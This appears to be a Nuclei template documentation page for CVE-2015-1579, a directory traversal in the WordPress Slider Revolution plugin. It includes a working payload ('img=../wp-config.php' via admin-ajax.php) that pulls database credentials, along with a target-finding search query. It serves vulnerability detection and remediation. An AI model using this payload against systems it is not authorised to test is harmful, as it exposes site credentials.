Skip to content
Nuclei Templates

WordPress Slider Revolution - Local File Disclosure

ID: CVE-2015-1579

Severity: medium

Author: pussycat0x

Tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes

Description

Section titled “Description”

Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.

YAML Source

Section titled “YAML Source”
id: CVE-2015-1579


info:
  name: WordPress Slider Revolution - Local File Disclosure
  author: pussycat0x
  severity: medium
  description: |
    Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
  impact: |
    An attacker can read arbitrary files on the server, potentially exposing sensitive information.
  remediation: |
    Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability.
  reference:
    - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
    - https://cxsecurity.com/issue/WLB-2021090129
    - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
    - https://nvd.nist.gov/vuln/detail/CVE-2015-1579
    - https://wpvulndb.com/vulnerabilities/7540
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-1579
    cwe-id: CWE-22
    epss-score: 0.82302
    epss-percentile: 0.98398
    cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: elegant_themes
    product: divi
    framework: wordpress
    google-query: inurl:/wp-content/plugins/revslider
  tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes


http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
      - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'DB_NAME'"
          - "'DB_PASSWORD'"
          - "'DB_USER'"
        condition: and


      - type: status
        status:
          - 200
# digest: 490a0046304402201ddae755c9a063458eee2d66a9b05ac1fa44dbb943ce8ace15e94071c9c2146c02203745f95f105bbfd3ecb6157fd41c5d7af873d02315dc59c4b83e84c85801bce0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-1579.yaml"

View on Github